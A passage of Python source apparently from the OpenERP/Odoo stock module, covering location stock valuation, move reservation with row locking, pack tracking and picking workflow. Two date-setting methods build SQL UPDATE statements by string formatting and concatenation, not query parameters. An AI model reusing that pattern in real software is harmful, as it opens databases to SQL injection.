        products_by_location = dict((k, [v['product_id'] for v in itr]) for k, itr in groupby(res_products_by_location, itemgetter('location_id')))

        result = dict([(i, {}.fromkeys(field_names, 0.0)) for i in ids])
        result.update(dict([(i, {}.fromkeys(field_names, 0.0)) for i in list(set([aaa['location_id'] for aaa in res_products_by_location]))]))

        currency_id = self.pool.get('res.users').browse(cr, uid, uid).company_id.currency_id.id
        currency_obj = self.pool.get('res.currency')
        currency = currency_obj.browse(cr, uid, currency_id, context=context)
        for loc_id, product_ids in products_by_location.items():
            if prod_id:
                product_ids = [prod_id]
            c = (context or {}).copy()
            c['location'] = loc_id
            for prod in product_product_obj.browse(cr, uid, product_ids, context=c):
                for f in field_names:
                    if f == 'stock_real':
                        if loc_id not in result:
                            result[loc_id] = {}
                        result[loc_id][f] += prod.qty_available
                    elif f == 'stock_virtual':
                        result[loc_id][f] += prod.virtual_available
                    elif f == 'stock_real_value':
                        amount = prod.qty_available * prod.standard_price
                        amount = currency_obj.round(cr, uid, currency, amount)
                        result[loc_id][f] += amount
                    elif f == 'stock_virtual_value':
                        amount = prod.virtual_available * prod.standard_price
                        amount = currency_obj.round(cr, uid, currency, amount)
                        result[loc_id][f] += amount
        return result

    _columns = {
        'name': fields.char('Location Name', size=64, required=True, translate=True),
        'active': fields.boolean('Active', help="By unchecking the active field, you may hide a location without deleting it."),
        'usage': fields.selection([('supplier', 'Supplier Location'), ('view', 'View'), ('internal', 'Internal Location'), ('customer', 'Customer Location'), ('inventory', 'Inventory'), ('procurement', 'Procurement'), ('production', 'Production'), ('transit', 'Transit Location for Inter-Companies Transfers')], 'Location Type', required=True,
                 help="""* Supplier Location: Virtual location representing the source location for products coming from your suppliers
                       \n* View: Virtual location used to create a hierarchical structures for your warehouse, aggregating its child locations ; can't directly contain products
                       \n* Internal Location: Physical locations inside your own warehouses,
                       \n* Customer Location: Virtual location representing the destination location for products sent to your customers
                       \n* Inventory: Virtual location serving as counterpart for inventory operations used to correct stock levels (Physical inventories)
                       \n* Procurement: Virtual location serving as temporary counterpart for procurement operations when the source (supplier or production) is not known yet. This location should be empty when the procurement scheduler has finished running.
                       \n* Production: Virtual counterpart location for production operations: this location consumes the raw material and produces finished products
                      """, select = True),
         # temporarily removed, as it's unused: 'allocation_method': fields.selection([('fifo', 'FIFO'), ('lifo', 'LIFO'), ('nearest', 'Nearest')], 'Allocation Method', required=True),
        'complete_name': fields.function(_complete_name, type='char', size=256, string="Location Name",
                            store={'stock.location': (_get_sublocations, ['name', 'location_id'], 10)}),

        'stock_real': fields.function(_product_value, type='float', string='Real Stock', multi="stock"),
        'stock_virtual': fields.function(_product_value, type='float', string='Virtual Stock', multi="stock"),

        'location_id': fields.many2one('stock.location', 'Parent Location', select=True, ondelete='cascade'),
        'child_ids': fields.one2many('stock.location', 'location_id', 'Contains'),

        'chained_journal_id': fields.many2one('stock.journal', 'Chaining Journal',help="Inventory Journal in which the chained move will be written, if the Chaining Type is not Transparent (no journal is used if left empty)"),
        'chained_location_id': fields.many2one('stock.location', 'Chained Location If Fixed'),
        'chained_location_type': fields.selection([('none', 'None'), ('customer', 'Customer'), ('fixed', 'Fixed Location')],
            'Chained Location Type', required=True,
            help="Determines whether this location is chained to another location, i.e. any incoming product in this location \n" \
                "should next go to the chained location. The chained location is determined according to the type :"\
                "\n* None: No chaining at all"\
                "\n* Customer: The chained location will be taken from the Customer Location field on the Partner form of the Partner that is specified in the Picking list of the incoming products." \
                "\n* Fixed Location: The chained location is taken from the next field: Chained Location if Fixed." \
                ),
        'chained_auto_packing': fields.selection(
            [('auto', 'Automatic Move'), ('manual', 'Manual Operation'), ('transparent', 'Automatic No Step Added')],
            'Chaining Type',
            required=True,
            help="This is used only if you select a chained location type.\n" \
                "The 'Automatic Move' value will create a stock move after the current one that will be "\
                "validated automatically. With 'Manual Operation', the stock move has to be validated "\
                "by a worker. With 'Automatic No Step Added', the location is replaced in the original move."
            ),
        'chained_picking_type': fields.selection([('out', 'Sending Goods'), ('in', 'Getting Goods'), ('internal', 'Internal')], 'Shipping Type', help="Shipping Type of the Picking List that will contain the chained move (leave empty to automatically detect the type based on the source and destination locations)."),
        'chained_company_id': fields.many2one('res.company', 'Chained Company', help='The company the Picking List containing the chained move will belong to (leave empty to use the default company determination rules'),
        'chained_delay': fields.integer('Chaining Lead Time',help="Delay between original move and chained move in days"),
        'partner_id': fields.many2one('res.partner', 'Location Address',help="Address of  customer or supplier."),
        'icon': fields.selection(tools.icons, 'Icon', size=64,help="Icon show in  hierarchical tree view"),

        'comment': fields.text('Additional Information'),
        'posx': fields.integer('Corridor (X)',help="Optional localization details, for information purpose only"),
        'posy': fields.integer('Shelves (Y)', help="Optional localization details, for information purpose only"),
        'posz': fields.integer('Height (Z)', help="Optional localization details, for information purpose only"),

        'parent_left': fields.integer('Left Parent', select=1),
        'parent_right': fields.integer('Right Parent', select=1),
        'stock_real_value': fields.function(_product_value, type='float', string='Real Stock Value', multi="stock", digits_compute=dp.get_precision('Account')),
        'stock_virtual_value': fields.function(_product_value, type='float', string='Virtual Stock Value', multi="stock", digits_compute=dp.get_precision('Account')),
        'company_id': fields.many2one('res.company', 'Company', select=1, help='Let this field empty if this location is shared between all companies'),
        'scrap_location': fields.boolean('Scrap Location', help='Check this box to allow using this location to put scrapped/damaged goods.'),
        'valuation_in_account_id': fields.many2one('account.account', 'Stock Valuation Account (Incoming)', domain = [('type','=','other')],
                                                   help="Used for real-time inventory valuation. When set on a virtual location (non internal type), "
                                                        "this account will be used to hold the value of products being moved from an internal location "
                                                        "into this location, instead of the generic Stock Output Account set on the product. "
                                                        "This has no effect for internal locations."),
        'valuation_out_account_id': fields.many2one('account.account', 'Stock Valuation Account (Outgoing)', domain = [('type','=','other')],
                                                   help="Used for real-time inventory valuation. When set on a virtual location (non internal type), "
                                                        "this account will be used to hold the value of products being moved out of this location "
                                                        "and into an internal location, instead of the generic Stock Output Account set on the product. "
                                                        "This has no effect for internal locations."),
    }
    _defaults = {
        'active': True,
        'usage': 'internal',
        'chained_location_type': 'none',
        'chained_auto_packing': 'manual',
        'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'stock.location', context=c),
        'posx': 0,
        'posy': 0,
        'posz': 0,
        'icon': False,
        'scrap_location': False,
    }

    def chained_location_get(self, cr, uid, location, partner=None, product=None, context=None):
        """ Finds chained location
        @param location: Location id
        @param partner: Partner id
        @param product: Product id
        @return: List of values
        """
        result = None
        if location.chained_location_type == 'customer':
            if partner:
                result = partner.property_stock_customer
            else:
                loc_id = self.pool['res.partner'].default_get(cr, uid, ['property_stock_customer'], context=context)['property_stock_customer']
                result = self.pool['stock.location'].browse(cr, uid, loc_id, context=context)
        elif location.chained_location_type == 'fixed':
            result = location.chained_location_id
        if result:
            return result, location.chained_auto_packing, location.chained_delay, location.chained_journal_id and location.chained_journal_id.id or False, location.chained_company_id and location.chained_company_id.id or False, location.chained_picking_type, False
        return result

    def picking_type_get(self, cr, uid, from_location, to_location, context=None):
        """ Gets type of picking.
        @param from_location: Source location
        @param to_location: Destination location
        @return: Location type
        """
        result = 'internal'
        if (from_location.usage=='internal') and (to_location and to_location.usage in ('customer', 'supplier')):
            result = 'out'
        elif (from_location.usage in ('supplier', 'customer')) and (to_location.usage == 'internal'):
            result = 'in'
        return result

    def _product_get_all_report(self, cr, uid, ids, product_ids=False, context=None):
        return self._product_get_report(cr, uid, ids, product_ids, context, recursive=True)

    def _product_get_report(self, cr, uid, ids, product_ids=False,
            context=None, recursive=False):
        """ Finds the product quantity and price for particular location.
        @param product_ids: Ids of product
        @param recursive: True or False
        @return: Dictionary of values
        """
        if context is None:
            context = {}
        product_obj = self.pool.get('product.product')
        # Take the user company and pricetype
        context['currency_id'] = self.pool.get('res.users').browse(cr, uid, uid, context=context).company_id.currency_id.id

        # To be able to offer recursive or non-recursive reports we need to prevent recursive quantities by default
        context['compute_child'] = False

        if not product_ids:
            product_ids = product_obj.search(cr, uid, [], context={'active_test': False})

        products = product_obj.browse(cr, uid, product_ids, context=context)
        products_by_uom = {}
        products_by_id = {}
        for product in products:
            products_by_uom.setdefault(product.uom_id.id, [])
            products_by_uom[product.uom_id.id].append(product)
            products_by_id.setdefault(product.id, [])
            products_by_id[product.id] = product

        result = {}
        result['product'] = []
        for id in ids:
            quantity_total = 0.0
            total_price = 0.0
            for uom_id in products_by_uom.keys():
                fnc = self._product_get
                if recursive:
                    fnc = self._product_all_get
                ctx = context.copy()
                ctx['uom'] = uom_id
                qty = fnc(cr, uid, id, [x.id for x in products_by_uom[uom_id]],
                        context=ctx)
                for product_id in qty.keys():
                    if not qty[product_id]:
                        continue
                    product = products_by_id[product_id]
                    quantity_total += qty[product_id]

                    # Compute based on pricetype
                    # Choose the right filed standard_price to read
                    amount_unit = product.price_get('standard_price', context=context)[product.id]
                    price = qty[product_id] * amount_unit

                    total_price += price
                    result['product'].append({
                        'price': amount_unit,
                        'prod_name': product.name,
                        'code': product.default_code, # used by lot_overview_all report!
                        'variants': product.variants or '',
                        'uom': product.uom_id.name,
                        'prod_qty': qty[product_id],
                        'price_value': price,
                    })
        result['total'] = quantity_total
        result['total_price'] = total_price
        return result

    def _product_get_multi_location(self, cr, uid, ids, product_ids=False, context=None,
                                    states=['done'], what=('in', 'out')):
        """
        @param product_ids: Ids of product
        @param states: List of states
        @param what: Tuple of
        @return:
        """
        product_obj = self.pool.get('product.product')
        if context is None:
            context = {}
        context.update({
            'states': states,
            'what': what,
            'location': ids
        })
        return product_obj.get_product_available(cr, uid, product_ids, context=context)

    def _product_get(self, cr, uid, id, product_ids=False, context=None, states=None):
        """
        @param product_ids:
        @param states:
        @return:
        """
        if states is None:
            states = ['done']
        ids = id and [id] or []
        return self._product_get_multi_location(cr, uid, ids, product_ids, context=context, states=states)

    def _product_all_get(self, cr, uid, id, product_ids=False, context=None, states=None):
        if states is None:
            states = ['done']
        # build the list of ids of children of the location given by id
        ids = id and [id] or []
        location_ids = self.search(cr, uid, [('location_id', 'child_of', ids)])
        return self._product_get_multi_location(cr, uid, location_ids, product_ids, context, states)

    def _product_virtual_get(self, cr, uid, id, product_ids=False, context=None, states=None):
        if states is None:
            states = ['done']
        return self._product_all_get(cr, uid, id, product_ids, context, ['confirmed', 'waiting', 'assigned', 'done'])

    def _product_reserve(self, cr, uid, ids, product_id, product_qty, context=None, lock=False):
        """
        Attempt to find a quantity ``product_qty`` (in the product's default uom or the uom passed in ``context``) of product ``product_id``
        in locations with id ``ids`` and their child locations. If ``lock`` is True, the stock.move lines
        of product with id ``product_id`` in the searched location will be write-locked using Postgres's
        "FOR UPDATE NOWAIT" option until the transaction is committed or rolled back, to prevent reservin
        twice the same products.
        If ``lock`` is True and the lock cannot be obtained (because another transaction has locked some of
        the same stock.move lines), a log line will be output and False will be returned, as if there was
        not enough stock.

        :param product_id: Id of product to reserve
        :param product_qty: Quantity of product to reserve (in the product's default uom or the uom passed in ``context``)
        :param lock: if True, the stock.move lines of product with id ``product_id`` in all locations (and children locations) with ``ids`` will
                     be write-locked using postgres's "FOR UPDATE NOWAIT" option until the transaction is committed or rolled back. This is
                     to prevent reserving twice the same products.
        :param context: optional context dictionary: if a 'uom' key is present it will be used instead of the default product uom to
                        compute the ``product_qty`` and in the return value.
        :return: List of tuples in the form (qty, location_id) with the (partial) quantities that can be taken in each location to
                 reach the requested product_qty (``qty`` is expressed in the default uom of the product), of False if enough
                 products could not be found, or the lock could not be obtained (and ``lock`` was True).
        """
        result = []
        amount = 0.0
        if context is None:
            context = {}
        uom_obj = self.pool.get('product.uom')
        uom_rounding = self.pool.get('product.product').browse(cr, uid, product_id, context=context).uom_id.rounding
        if context.get('uom'):
            uom_rounding = uom_obj.browse(cr, uid, context.get('uom'), context=context).rounding

        locations_ids = self.search(cr, uid, [('location_id', 'child_of', ids)])
        if locations_ids:
            # Fetch only the locations in which this product has ever been processed (in or out)
            cr.execute("""SELECT l.id FROM stock_location l WHERE l.id in %s AND
                        EXISTS (SELECT 1 FROM stock_move m WHERE m.product_id = %s
                                AND ((state = 'done' AND m.location_dest_id = l.id)
                                    OR (state in ('done','assigned') AND m.location_id = l.id)))
                       """, (tuple(locations_ids), product_id,))
            locations_ids = [i for (i,) in cr.fetchall()]
        for id in locations_ids:
            if lock:
                try:
                    # Must lock with a separate select query because FOR UPDATE can't be used with
                    # aggregation/group by's (when individual rows aren't identifiable).
                    # We use a SAVEPOINT to be able to rollback this part of the transaction without
                    # failing the whole transaction in case the LOCK cannot be acquired.
                    cr.execute("SAVEPOINT stock_location_product_reserve")
                    cr.execute("""SELECT id FROM stock_move
                                  WHERE product_id=%s AND
                                          (
                                            (location_dest_id=%s AND
                                             location_id<>%s AND
                                             state='done')
                                            OR
                                            (location_id=%s AND
                                             location_dest_id<>%s AND
                                             state in ('done', 'assigned'))
                                          )
                                  FOR UPDATE of stock_move NOWAIT""", (product_id, id, id, id, id), log_exceptions=False)
                except Exception:
                    # Here it's likely that the FOR UPDATE NOWAIT failed to get the LOCK,
                    # so we ROLLBACK to the SAVEPOINT to restore the transaction to its earlier
                    # state, we return False as if the products were not available, and log it:
                    cr.execute("ROLLBACK TO stock_location_product_reserve")
                    _logger.warning("Failed attempt to reserve %s x product %s, likely due to another transaction already in progress. Next attempt is likely to work. Detailed error available at DEBUG level.", product_qty, product_id)
                    _logger.debug("Trace of the failed product reservation attempt: ", exc_info=True)
                    return False

            # XXX TODO: rewrite this with one single query, possibly even the quantity conversion
            cr.execute("""SELECT product_uom, sum(product_qty) AS product_qty
                          FROM stock_move
                          WHERE location_dest_id=%s AND
                                location_id<>%s AND
                                product_id=%s AND
                                state='done'
                          GROUP BY product_uom
                       """,
                       (id, id, product_id))
            results = cr.dictfetchall()
            cr.execute("""SELECT product_uom,-sum(product_qty) AS product_qty
                          FROM stock_move
                          WHERE location_id=%s AND
                                location_dest_id<>%s AND
                                product_id=%s AND
                                state in ('done', 'assigned')
                          GROUP BY product_uom
                       """,
                       (id, id, product_id))
            results += cr.dictfetchall()
            total = 0.0
            results2 = 0.0
            for r in results:
                amount = uom_obj._compute_qty(cr, uid, r['product_uom'], r['product_qty'], context.get('uom', False))
                results2 += amount
                total += amount
            if total <= 0.0:
                continue

            amount = results2
            compare_qty = float_compare(amount, 0, precision_rounding=uom_rounding)
            if compare_qty == 1:
                if amount > min(total, product_qty):
                    amount = min(product_qty, total)
                result.append((amount, id))
                product_qty -= amount
                total -= amount
                if product_qty <= 0.0:
                    return result
                if total <= 0.0:
                    continue
        return False

stock_location()


class stock_tracking(osv.osv):
    _name = "stock.tracking"
    _description = "Packs"

    def checksum(sscc):
        salt = '31' * 8 + '3'
        sum = 0
        for sscc_part, salt_part in zip(sscc, salt):
            sum += int(sscc_part) * int(salt_part)
        return (10 - (sum % 10)) % 10
    checksum = staticmethod(checksum)

    def make_sscc(self, cr, uid, context=None):
        sequence = self.pool.get('ir.sequence').get(cr, uid, 'stock.lot.tracking')
        try:
            return sequence + str(self.checksum(sequence))
        except Exception:
            return sequence

    _columns = {
        'name': fields.char('Pack Reference', size=64, required=True, select=True, help="By default, the pack reference is generated following the sscc standard. (Serial number + 1 check digit)"),
        'active': fields.boolean('Active', help="By unchecking the active field, you may hide a pack without deleting it."),
        'serial': fields.char('Additional Reference', size=64, select=True, help="Other reference or serial number"),
        'move_ids': fields.one2many('stock.move', 'tracking_id', 'Moves for this pack', readonly=True),
        'date': fields.datetime('Creation Date', required=True),
    }
    _defaults = {
        'active': 1,
        'name': make_sscc,
        'date': lambda *a: time.strftime('%Y-%m-%d %H:%M:%S'),
    }

    def name_search(self, cr, user, name, args=None, operator='ilike', context=None, limit=100):
        if not args:
            args = []
        ids = self.search(cr, user, [('serial', '=', name)]+ args, limit=limit, context=context)
        ids += self.search(cr, user, [('name', operator, name)]+ args, limit=limit, context=context)
        return self.name_get(cr, user, ids, context)

    def name_get(self, cr, uid, ids, context=None):
        """Append the serial to the name"""
        if not len(ids):
            return []
        res = [ (r['id'], r['serial'] and '%s [%s]' % (r['name'], r['serial'])
                                      or r['name'] )
                for r in self.read(cr, uid, ids, ['name', 'serial'],
                                   context=context) ]
        return res

    def unlink(self, cr, uid, ids, context=None):
        raise osv.except_osv(_('Error!'), _('You cannot remove a lot line.'))

    def action_traceability(self, cr, uid, ids, context=None):
        """ It traces the information of a product
        @param self: The object pointer.
        @param cr: A database cursor
        @param uid: ID of the user currently logged in
        @param ids: List of IDs selected
        @param context: A standard dictionary
        @return: A dictionary of values
        """
        return self.pool.get('action.traceability').action_traceability(cr,uid,ids,context)

stock_tracking()

#----------------------------------------------------------
# Stock Picking
#----------------------------------------------------------
class stock_picking(osv.osv):
    _name = "stock.picking"
    _inherit = ['mail.thread']
    _description = "Picking List"
    _order = "id desc"

    def _set_maximum_date(self, cr, uid, ids, name, value, arg, context=None):
        """ Calculates planned date if it is greater than 'value'.
        @param name: Name of field
        @param value: Value of field
        @param arg: User defined argument
        @return: True or False
        """
        if not value:
            return False
        if isinstance(ids, (int, long)):
            ids = [ids]
        for pick in self.browse(cr, uid, ids, context=context):
            sql_str = """update stock_move set
                    date_expected='%s'
                where
                    picking_id=%d """ % (value, pick.id)
            if pick.max_date:
                sql_str += " and (date_expected='" + pick.max_date + "')"
            cr.execute(sql_str)
        return True

    def _set_minimum_date(self, cr, uid, ids, name, value, arg, context=None):
        """ Calculates planned date if it is less than 'value'.
        @param name: Name of field
        @param value: Value of field
        @param arg: User defined argument
        @return: True or False
        """
        if not value:
            return False
        if isinstance(ids, (int, long)):
            ids = [ids]
        for pick in self.browse(cr, uid, ids, context=context):
            sql_str = """update stock_move set
                    date_expected='%s'
                where
                    picking_id=%s """ % (value, pick.id)
            if pick.min_date:
                sql_str += " and (date_expected='" + pick.min_date + "')"
            cr.execute(sql_str)
        return True

    def get_min_max_date(self, cr, uid, ids, field_name, arg, context=None):
        """ Finds minimum and maximum dates for picking.
        @return: Dictionary of values
        """
        res = {}
        for id in ids:
            res[id] = {'min_date': False, 'max_date': False}
        if not ids:
            return res
        cr.execute("""select
                picking_id,
                min(date_expected),
                max(date_expected)
            from
                stock_move
            where
                picking_id IN %s
            group by
                picking_id""",(tuple(ids),))
        for pick, dt1, dt2 in cr.fetchall():
            res[pick]['min_date'] = dt1
            res[pick]['max_date'] = dt2
        return res

    def create(self, cr, user, vals, context=None):
        if ('name' not in vals) or (vals.get('name')=='/'):
            seq_obj_name =  self._name
            vals['name'] = self.pool.get('ir.sequence').get(cr, user, seq_obj_name)
        new_id = super(stock_picking, self).create(cr, user, vals, context)
        return new_id

    _columns = {
        'name': fields.char('Reference', size=64, select=True, states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}),
        'origin': fields.char('Source Document', size=64, states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}, help="Reference of the document", select=True),
        'backorder_id': fields.many2one('stock.picking', 'Back Order of', states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}, help="If this shipment was split, then this field links to the shipment which contains the already processed part.", select=True),
        'type': fields.selection([('out', 'Sending Goods'), ('in', 'Getting Goods'), ('internal', 'Internal')], 'Shipping Type', required=True, select=True, help="Shipping type specify, goods coming in or going out."),
        'note': fields.text('Notes', states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}),
        'stock_journal_id': fields.many2one('stock.journal','Stock Journal', select=True, states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}),
        'location_id': fields.many2one('stock.location', 'Location', states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}, help="Keep empty if you produce at the location where the finished products are needed." \
                "Set a location if you produce at a fixed location. This can be a partner location " \
                "if you subcontract the manufacturing operations.", select=True),
        'location_dest_id': fields.many2one('stock.location', 'Dest. Location', states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}, help="Location where the system will stock the finished products.", select=True),
        'move_type': fields.selection([('direct', 'Partial'), ('one', 'All at once')], 'Delivery Method', required=True, states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}, help="It specifies goods to be deliver partially or all at once"),
        'state': fields.selection([
            ('draft', 'Draft'),
            ('cancel', 'Cancelled'),
            ('auto', 'Waiting Another Operation'),
            ('confirmed', 'Waiting Availability'),
            ('assigned', 'Ready to Transfer'),
            ('done', 'Transferred'),
            ], 'Status', readonly=True, select=True, track_visibility='onchange', help="""
            * Draft: not confirmed yet and will not be scheduled until confirmed\n
            * Waiting Another Operation: waiting for another move to proceed before it becomes automatically available (e.g. in Make-To-Order flows)\n
            * Waiting Availability: still waiting for the availability of products\n
            * Ready to Transfer: products reserved, simply waiting for confirmation.\n
            * Transferred: has been processed, can't be modified or cancelled anymore\n
            * Cancelled: has been cancelled, can't be confirmed anymore"""
        ),
        'min_date': fields.function(get_min_max_date, fnct_inv=_set_minimum_date, multi="min_max_date",
                 store=True, type='datetime', string='Scheduled Time', select=1, help="Scheduled time for the shipment to be processed"),
        'date': fields.datetime('Creation Date', help="Creation date, usually the time of the order.", select=True, states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}),
        'date_done': fields.datetime('Date of Transfer', help="Date of Completion", states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}),
        'max_date': fields.function(get_min_max_date, fnct_inv=_set_maximum_date, multi="min_max_date",
                 store=True, type='datetime', string='Max. Expected Date', select=2),
        'move_lines': fields.one2many('stock.move', 'picking_id', 'Internal Moves', states={'done': [('readonly', True)], 'cancel': [('readonly', True)]}),
        'product_id': fields.related('move_lines', 'product_id', type='many2one', relation='product.product', string='Product'),
        'auto_picking': fields.boolean('Auto-Picking', states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}),
        'partner_id': fields.many2one('res.partner', 'Partner', states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}),
        'invoice_state': fields.selection([
            ("invoiced", "Invoiced"),
            ("2binvoiced", "To Be Invoiced"),
            ("none", "Not Applicable")], "Invoice Control",
            select=True, required=True, readonly=True, track_visibility='onchange', states={'draft': [('readonly', False)]}),
        'company_id': fields.many2one('res.company', 'Company', required=True, select=True, states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}),
    }
    _defaults = {
        'name': lambda self, cr, uid, context: '/',
        'state': 'draft',
        'move_type': 'direct',
        'type': 'internal',
        'invoice_state': 'none',
        'date': lambda *a: time.strftime('%Y-%m-%d %H:%M:%S'),
        'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'stock.picking', context=c)
    }
    _sql_constraints = [
        ('name_uniq', 'unique(name, company_id)', 'Reference must be unique per Company!'),
    ]

    def action_process(self, cr, uid, ids, context=None):
        if context is None:
            context = {}
        """Open the partial picking wizard"""
        context.update({
            'active_model': self._name,
            'active_ids': ids,
            'active_id': len(ids) and ids[0] or False
        })
        return {
            'view_type': 'form',
            'view_mode': 'form',
            'res_model': 'stock.partial.picking',
            'type': 'ir.actions.act_window',
            'target': 'new',
            'context': context,
            'nodestroy': True,
        }

    def copy(self, cr, uid, id, default=None, context=None):
        if default is None:
            default = {}
        default = default.copy()
        picking_obj = self.browse(cr, uid, id, context=context)
        move_obj = self.pool.get('stock.move')
        if ('name' not in default) or (picking_obj.name == '/'):
            seq_obj_name = 'stock.picking.' + picking_obj.type
            default['name'] = self.pool.get('ir.sequence').get(cr, uid, seq_obj_name)
            default['origin'] = ''
            default['backorder_id'] = False
        if 'invoice_state' not in default and picking_obj.invoice_state == 'invoiced':
            default['invoice_state'] = '2binvoiced'
        res = super(stock_picking, self).copy(cr, uid, id, default, context)
        if res:
            picking_obj = self.browse(cr, uid, res, context=context)
            for move in picking_obj.move_lines:
                move_obj.write(cr, uid, [move.id], {'tracking_id': False, 'prodlot_id': False, 'move_history_ids2': [(6, 0, [])], 'move_history_ids': [(6, 0, [])]})
        return res

    def fields_view_get(self, cr, uid, view_id=None, view_type=False, context=None, toolbar=False, submenu=False):
        if view_type == 'form' and not view_id:
            mod_obj = self.pool.get('ir.model.data')
            if self._name == "stock.picking.in":
                model, view_id = mod_obj.get_object_reference(cr, uid, 'stock', 'view_picking_in_form')
            if self._name == "stock.picking.out":
                model, view_id = mod_obj.get_object_reference(cr, uid, 'stock', 'view_picking_out_form')
        return super(stock_picking, self).fields_view_get(cr, uid, view_id=view_id, view_type=view_type, context=context, toolbar=toolbar, submenu=submenu)

    def onchange_partner_in(self, cr, uid, ids, partner_id=None, context=None):
        return {}

    def action_explode(self, cr, uid, moves, context=None):
        """Hook to allow other modules to split the moves of a picking."""
        return moves

    def action_confirm(self, cr, uid, ids, context=None):
        """ Confirms picking.
        @return: True
        """
        pickings = self.browse(cr, uid, ids, context=context)
        self.write(cr, uid, ids, {'state': 'confirmed'})
        todo = []
        for picking in pickings:
            for r in picking.move_lines:
                if r.state == 'draft':
                    todo.append(r.id)
        todo = self.action_explode(cr, uid, todo, context)
        if len(todo):
            self.pool.get('stock.move').action_confirm(cr, uid, todo, context=context)
        return True

    def test_auto_picking(self, cr, uid, ids):
        # TODO: Check locations to see if in the same location ?
        return True

    def action_assign(self, cr, uid, ids, *args):
        """ Changes state of picking to available if all moves are confirmed.
        @return: True
        """
        wf_service = netsvc.LocalService("workflow")
        for pick in self.browse(cr, uid, ids):
            if pick.state == 'draft':
                wf_service.trg_validate(uid, 'stock.picking', pick.id, 'button_confirm', cr)
            move_ids = [x.id for x in pick.move_lines if x.state == 'confirmed']
            if not move_ids:
                raise osv.except_osv(_('Warning!'),_('Not enough stock, unable to reserve the products.'))
            self.pool.get('stock.move').action_assign(cr, uid, move_ids)
        return True

    def force_assign(self, cr, uid, ids, *args):
        """ Changes state of picking to available if moves are confirmed or waiting.
        @return: True
        """
        wf_service = netsvc.LocalService("workflow")
        for pick in self.browse(cr, uid, ids):
            move_ids = [x.id for x in pick.move_lines if x.state in ['confirmed','waiting']]
            self.pool.get('stock.move').force_assign(cr, uid, move_ids)
            wf_service.trg_write(uid, 'stock.picking', pick.id, cr)
        return True

    def draft_force_assign(self, cr, uid, ids, *args):
        """ Confirms picking directly from draft state.
        @return: True
        """
        wf_service = netsvc.LocalService("workflow")
        for pick in self.browse(cr, uid, ids):
            if not pick.move_lines:
                raise osv.except_osv(_('Error!'),_('You cannot process picking without stock moves.'))
            wf_service.trg_validate(uid, 'stock.picking', pick.id,
                'button_confirm', cr)
        return True

    def draft_validate(self, cr, uid, ids, context=None):
        """ Validates picking directly from draft state.
        @return: True
        """
        wf_service = netsvc.LocalService("workflow")
        self.draft_force_assign(cr, uid, ids)
        for pick in self.browse(cr, uid, ids, context=context):
            move_ids = [x.id for x in pick.move_lines]
            self.pool.get('stock.move').force_assign(cr, uid, move_ids)
            wf_service.trg_write(uid, 'stock.picking', pick.id, cr)
        return self.action_process(
            cr, uid, ids, context=context)
    def cancel_assign(self, cr, uid, ids, *args):
        """ Cancels picking and moves.
        @return: True
        """
        wf_service = netsvc.LocalService("workflow")
        for pick in self.browse(cr, uid, ids):
            move_ids = [x.id for x in pick.move_lines]
            self.pool.get('stock.move').cancel_assign(cr, uid, move_ids)
            wf_service.trg_write(uid, 'stock.picking', pick.id, cr)
        return True

    def action_assign_wkf(self, cr, uid, ids, context=None):
        """ Changes picking state to assigned.
        @return: True
        """
        self.write(cr, uid, ids, {'state': 'assigned'})
        return True

    def test_finished(self, cr, uid, ids):
        """ Tests whether the move is in done or cancel state or not.
        @return: True or False
        """
        move_ids = self.pool.get('stock.move').search(cr, uid, [('picking_id', 'in', ids)])
        for move in self.pool.get('stock.move').browse(cr, uid, move_ids):
            if move.state not in ('done', 'cancel'):

                if move.product_qty != 0.0:
                    return False
                else:
                    move.write({'state': 'done'})
        return True

    def test_assigned(self, cr, uid, ids):
        """ Tests whether the move is in assigned state or not.
        @return: True or False
        """
        #TOFIX: assignment of move lines should be call before testing assigment otherwise picking never gone in assign state
        ok = True
        for pick in self.browse(cr, uid, ids):
            mt = pick.move_type
            # incomming shipments are always set as available if they aren't chained
            if pick.type == 'in':
                if all([x.state != 'waiting' for x in pick.move_lines]):
                    return True
            for move in pick.move_lines:
                if (move.state in ('confirmed', 'draft')) and (mt == 'one'):
                    return False
                if (mt == 'direct') and (move.state == 'assigned') and (move.product_qty):
                    return True
                ok = ok and (move.state in ('cancel', 'done', 'assigned'))
        return ok

    def action_cancel(self, cr, uid, ids, context=None):
        """ Changes picking state to cancel.
        @return: True
        """
        for pick in self.browse(cr, uid, ids, context=context):
            ids2 = [move.id for move in pick.move_lines]
            self.pool.get('stock.move').action_cancel(cr, uid, ids2, context)
        self.write(cr, uid, ids, {'state': 'cancel', 'invoice_state': 'none'})
        return True

    #
    # TODO: change and create a move if not parents
    #
    def action_done(self, cr, uid, ids, context=None):
        """Changes picking state to done.
        
        This method is called at the end of the workflow by the activity "done".
        @return: True
        """
        self.write(cr, uid, ids, {'state': 'done', 'date_done': time.strftime('%Y-%m-%d %H:%M:%S')})
        return True

    def action_move(self, cr, uid, ids, context=None):
        """Process the Stock Moves of the Picking
        
        This method is called by the workflow by the activity "move".
        Normally that happens when the signal button_done is received (button 
        "Done" pressed on a Picking view). 
        @return: True
        """
        for pick in self.browse(cr, uid, ids, context=context):
            todo = []
            for move in pick.move_lines:
                if move.state == 'draft':
                    self.pool.get('stock.move').action_confirm(cr, uid, [move.id],
                        context=context)
                    todo.append(move.id)
                elif move.state in ('assigned','confirmed'):
                    todo.append(move.id)
            if len(todo):
                self.pool.get('stock.move').action_done(cr, uid, todo,
                        context=context)
        return True

    def get_currency_id(self, cr, uid, picking):
        return False

    def _get_partner_to_invoice(self, cr, uid, picking, context=None):
        """ Gets the partner that will be invoiced
            Note that this function is inherited in the sale and purchase modules
            @param picking: object of the picking for which we are selecting the partner to invoice
            @return: object of the partner to invoice
        """
        return picking.partner_id and picking.partner_id.id

